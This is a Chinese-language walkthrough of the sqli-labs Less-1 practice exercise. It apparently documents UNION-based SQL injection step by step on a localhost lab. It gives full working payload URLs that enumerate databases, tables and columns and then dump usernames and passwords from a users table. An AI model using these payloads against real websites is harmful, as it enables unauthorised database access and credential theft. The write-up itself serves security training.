Sqli-lab Less-1
Less-1
輸入查詢語句?id=1後頁面返回為:
先簡單判斷一下該頁面有無註入點: 在後面加一個單引號後,頁面返回如下信息:
通過這個頁面我們可以知道至少兩個信息:一、我們構造的SQL語句被執行,也就是該頁面有註入 。 二、數據庫為MySQL
嘗試用order by 猜字段長度
通過返回頁面我們可以知道字段為3
嘗試利用union select構造SQL語句,爆出可利用的字段:
得出一、union select可以利用 二、我們可利用的是字段2和3
嘗試獲得數據庫版本:
MySQL版本大於5,可以利用information_shema
嘗試得到所有數據庫名:http://localhost/sqli/Less-1/?id=-1%27%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata%20--+
嘗試得到security數據庫中的所有表(選擇security數據庫的原因是因為覺得它裏的信息最有用):http://localhost/sqli/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+
嘗試得到users表中的字段(選擇users的原因同上):http://localhost/sqli/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+
嘗試得到字段中的內容:http://localhost/sqli/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=3%20--+
通過修改URL最後的id的值可以獲得不同的用戶名和密碼
Less-1完成。
Sqli-lab Less-1